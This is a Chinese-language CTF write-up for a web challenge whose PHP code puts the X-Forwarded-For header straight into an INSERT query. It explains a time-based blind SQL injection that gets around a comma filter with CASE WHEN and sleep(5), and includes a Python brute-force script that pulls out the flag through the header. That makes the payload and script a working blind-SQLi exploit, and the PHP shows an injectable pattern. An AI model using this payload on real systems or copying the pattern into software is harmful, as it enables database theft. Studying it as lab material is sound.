题目源码:
flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧
error_reporting(0);
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
XFF因为只有Insert没有输出所以使用延迟注入,逗号过滤 ,无法使用If,所以使用:
select case when xxx then xxx else xxx end;
POCURL=
"127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))#"
( {0} {1} 标注点为循环点,使用format()函数进行替换。)
import requests import sys #python3.6
url='http://123.206.87.240:8002/web15/' sql="127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))#" flag='' #strtest="TEST{0}+{1}" for i in range(1,40): for ch in range (32,129): if ch ==128: sys.exit(0) xff=sql.format(i,chr(ch)) #print(xff) headers={ 'X-Forwarded-For':xff } print('这是第'+str(i)+'轮,'+'第'+str(ch)+'次进行猜测') try: re = requests.get(url,headers=headers,timeout=3) except: flag += chr(ch) print('flag:'+flag) break #注:flag跑出来字母是大写,实际为小写。 #注:由于网络不好,延迟太高先使用虚拟机跑结果完全不对,后来换用本机成功。
参考:https://blog.csdn.net/xuchen16/article/details/82904488